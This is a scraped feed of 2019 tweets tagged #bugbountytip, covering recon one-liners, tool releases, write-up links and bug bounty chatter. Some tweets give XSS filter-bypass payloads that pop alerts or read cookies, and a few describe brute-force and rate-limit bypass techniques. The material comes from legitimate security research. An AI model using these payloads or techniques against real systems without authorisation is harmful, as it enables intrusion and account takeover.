0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluz🔥
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability 🤑🤑🤑🤑 https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluz🔥
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast on the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as guests 🥳 #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! This release is specially dedicated to @SlackHQ! An issue that prevented pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parameter pollution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better than this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi 🕊️
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi 🕊️
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why don't you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if it's vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN Th✪sH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, its not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can wreck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluz🔥
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got a really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluz🔥
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap… https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
ฮ›ัะฒั”ฮท
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, it's a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If you're struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If you're not looking for these on your bug bounties you're missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$💪👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke. I really like its Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading a malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I’m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 🇦🇷
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi 🕊️
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip 💪 Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix its #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💸 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌴
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07
4 one of my bypasses in script context: 1')});x=(document),y=x.cookie;(alert)(y);function r(){a('b bypasses to alert cookie which was restricted, also finishes some function #XSS #WAFbypass #bugbountytip @zseano @brutelogic
intigriti
@intigriti


2019-09-23 13:45:34
16 Open your eyes and see: there is more than S3! 👀 @hussein98d recommends cloud_enum to find unprotected Google Cloud buckets and Microsoft Azure storage accounts! 📦🔓#BugBountyTip 👉 https://t.co/jdufh0L7fR https://t.co/OqRtTIanb5
Anas Mahmood 🇵🇰
@AnasIsHere


2019-09-23 06:25:43
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside javascript & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the javascript, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:52:18
2 Google will pay you $1,000 to hack some of Android’s most popular apps Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/P5Zgaqbfaw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:50:26
0 Google’s bug bounty programs paid out almost $3M in 2017 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops https://t.co/YYTW4ja3WZ
Anas Mahmood 🇵🇰
@AnasIsHere


2019-09-23 05:46:25
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside script tag & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the script tag, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:44:03
3 Facebook expands bug bounty program to include third-party apps and websites Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/JbayjPAGUw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:41:34
0 Google will now pay bigger rewards for discovering Chrome security bugs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/54qJVMUyN1
Pomegranate 🌴
@ret2pomegranate


2019-09-22 23:48:57
0 Just reported RCE to a program on @Hacker0x01. At first PHP functions like exec(), system() weren’t being executed due to PHP disabling these. Was able to disable the function itself and made system() available again & boom RCE. #bugbounty #BugBountyTip #hackerone #infosec
baluz🔥
@haknfuk


2019-09-22 17:15:22
2 https://t.co/LHR5DiByot free free free #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-22 14:54:07
3 Maximise Your Bug Bounty Scope and Payout with #AMASS from $$ OWASP $$ https://t.co/UZCGyJAWXQ Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops
A hacker's life
@Unknownuser1806


2019-09-22 14:29:59
1 This is a collection of writeups, cheat sheets, videos, related to SSRF in one single location https://t.co/DEn6Z8EY5X #SSRF, #bugbounty, #BugBountyTip
hacks2learn
@hacks2learn


2019-09-22 12:55:15
0 For those looking for new ideas... I re-discovered this awesome article today by @Jackson_T and I'm sharing it as it is an excellent resource for learning how to find vulnerabilities https://t.co/1QeTSFfaxl #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-22 12:09:38
1 Looking for Rare SQL Injection Bugs ? Maximise your Bug Bounty Payouts SQL Injection Tutorial - OWASP JuiceShop Hidden Christmas Surprise Challenge 💰💰💰💰 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/N4vjkRujJj
expl0itc0der
@vanshitmalhotra


2019-09-22 12:03:33
0 A5 Broken Access Control Forced Browsing OWASP Juice Shop Tutorial Follow On Facebook $$$ https://t.co/iNczOcGmCt Subscribe on Youtube https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #devsecops #cybersecurity https://t.co/yQ2JhdWzi2
expl0itc0der
@vanshitmalhotra


2019-09-22 11:53:29
2 A6 Directory Listing Security Misconfiguration OWASP Juice Shop Tutorial Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting https://t.co/2gtd4DxOSr
m0z
@LooseSecurity


2019-09-22 10:33:56
3 What languages do you think are the best for hackers? It's a common question, interested to know what others think. In my opinion PHP programmers are very security-aware. Python is good for bug bounty automation. JS is good for advanced XSS payloads/PoCs. #BugBountyTip
OWASP Amass
@owaspamass


2019-09-22 05:28:59
5 OWASP Amass Tip For ASNs: amass intel -org OrgName For domain names: amass intel -active -asn n1,n2 For subdomains and infrastructure: amass enum -src -ip -df domains.txt #osint #recon #assetdiscovery #subdomain #enumeration #bugbounty #bugbountytip https://t.co/QWTftRbJKT
Vulkey_Chen
@Vulkey_Chen


2019-09-22 03:57:34
0 #BugBounty #BugBountyTips #BugBountyTip I build a burpsuite extension to mark sensitive information. e.g. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. Open Source Address: https://t.co/zvEFnVh0FK https://t.co/fNN80C1Etz
iamsushi
@sushiwushi2


2019-09-22 02:21:14
0 Here's a #BugBountyTip, if you are lazy like me to manually generate a POST request CSRF POC, consider using this tool https://t.co/tEzQaMmFgB
Securisec 🚀
@securisec


2019-09-21 23:55:24
0 "RT RT vanshitmalhotra: XSS Filter Bypass on https://t.co/bT7rV3brs6 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/z6m1vQwWw1 (mobile version) https://t.co/gJY9DNkfiL #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting"
expl0itc0der
@vanshitmalhotra


2019-09-21 22:50:44
0 XSS Filter Bypass on https://t.co/bFnci9AWC2 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/oz7xPDki4P (mobile version) https://t.co/mVUPFSwEL0 #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting
expl0itc0der
@vanshitmalhotra


2019-09-21 21:19:49
3 A5 Broken Access Control OWASP Juice Shop Challenge - OWASP Top Ten Tutorial https://t.co/BQlGp02UDf #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
expl0itc0der
@vanshitmalhotra


2019-09-21 21:15:14
